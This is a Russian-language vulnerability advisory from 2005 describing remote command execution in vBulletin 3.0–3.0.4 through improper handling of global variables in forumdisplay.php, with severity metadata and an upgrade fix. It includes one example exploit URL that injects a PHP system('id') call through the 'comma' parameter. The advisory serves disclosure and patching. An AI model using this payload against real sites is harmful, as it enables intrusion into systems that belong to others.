Выполнение произвольных команд в vBulletin

Дата публикации:
15.02.2005
Дата изменения:
17.10.2006
Всего просмотров:
5629
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
vBulletin 2.x
vBulletin 3.x
Уязвимые версии: vBulletin 3.0 - 3.0.4

Описание:
Уязвимость в vBulletin позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.

Уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.

Пример/Эксплоит:

http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

URL производителя: http://www.vbulletin.com

Решение: Установите последнюю версию с сайта производителя.

Ссылки: Arbitrary Command Execution in vBulletin

или введите имя

CAPTCHA